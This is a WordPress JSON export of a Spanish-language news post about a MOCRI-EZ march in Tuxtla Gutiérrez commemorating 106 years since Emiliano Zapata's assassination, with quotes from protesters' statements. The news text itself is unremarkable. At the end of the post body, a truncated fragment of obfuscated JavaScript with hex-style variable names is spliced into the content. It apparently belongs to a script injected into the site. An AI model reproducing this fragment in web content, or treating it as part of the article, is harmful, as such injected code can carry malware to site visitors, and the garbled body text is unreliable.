{"id":21406,"date":"2025-04-11T03:06:57","date_gmt":"2025-04-11T03:06:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21406"},"modified":"2025-04-11T03:06:58","modified_gmt":"2025-04-11T03:06:58","slug":"mocri-vuelve-a-salir-a-las-calles-recuerda-aniversario-luctuoso-de-zapata","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21406","title":{"rendered":"MOCRI vuelve a salir a las calles, recuerda aniversario luctuoso de Zapata"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250410-WA0030-1024x765.jpg\" alt=\"\" class=\"wp-image-21407\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250410-WA0030-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250410-WA0030-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250410-WA0030-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250410-WA0030-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250410-WA0030.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>10 de abril del 2025. Tuxtla Guti\u00e9rrez.- Diferentes organizaciones realizaron una marcha este jueves para conmemorar el 106 aniversario del caudillo del Sur Emiliano Zapata en la capital chiapaneca.<\/p>\n\n\n\n<p>Los manifestantes salieron del Parque 5 de Mayo hacia el centro de Tuxtla Guti\u00e9rrez en donde lanzaron consignas en contra de los tres niveles de gobierno por las pol\u00edticas neoliberales impuestas.<\/p>\n\n\n\n<p>El vocero del MOCRI-EZ expres\u00f3: \u201cLas organizaciones que hoy nos movilizamos en pleno uso de nuestras libertades democr\u00e1ticas y derechos pol\u00edticos constitucionales, nos dirigimos a la clase trabajadora y los pueblos del mundo para expresar nuestro pensamiento a 106 a\u00f1os del cobarde asesinato del General Emiliano Zapata Salazar\u201d.<\/p>\n\n\n\n<p>Los integrantes de estas organizaciones indicaron que, en un escenario pol\u00edtico econ\u00f3mico internacional cuyos principales signos son la crisis estructural del sistema capitalista, la guerra de rapi\u00f1a entre las potencias imperialistas para repartirse el mundo y sus riquezas, el genocidio contra el pueblo palestino y el oriente pr\u00f3ximo prevalece.<\/p>\n\n\n\n<p>Lamentaron el panorama de despojo de los derechos sociales y laborales de los trabajadores y la migraci\u00f3n de miles de personas en todos los continentes, la clase trabajadora.<\/p>\n\n\n\n<p>\u201cLos pueblos del mundo resistimos y luchamos contra las medidas neoliberales que aniquilan nuestros derechos pol\u00edticos y libertades democr\u00e1ticas\u201d, agregaron.<\/p>\n\n\n\n<p>\u201cLos explotados seguimos padeciendo los estragos de la crisis econ\u00f3mica, la violencia e Inseguridad p\u00fablica, la corrupci\u00f3n y el nepotismo, la carest\u00eda y los altos impuestos, las extorsiones y las amenazas de la delincuencia organizada y las corporaciones policiacas, la persecuci\u00f3n a nuestra militancia y la descalificaci\u00f3n de nuestra lucha, el encarcelamiento y el asesinato de nuestros dirigentes\u201d, expresaron.<\/p>\n\n\n\n<p>Precisaron que: \u201cHoy 10 de abril de 2025, en calles y plazas de todos los rincones de M\u00e9xico, las consignas de Zapata Vive la lucha sigue, si Zapata viviera con nosotros estuviera, explotan en miles de gargantas exigiendo justicia para nuestros ca\u00eddos\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 10 de abril del 2025. Tuxtla Guti\u00e9rrez.- Diferentes organizaciones realizaron una marcha este jueves para conmemorar el 106 aniversario del caudillo del Sur Emiliano Zapata en la capital chiapaneca. Los manifestantes salieron del Parque 5 de Mayo hacia el centro de Tuxtla Guti\u00e9rrez en donde lanzaron consignas en contra de los tres niveles &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21407,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21406","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21406","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21406"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21406\/revisions"}],"predecessor-version":[{"id":21408,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21406\/revisions\/21408"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21407"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21406"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21406"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21406"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}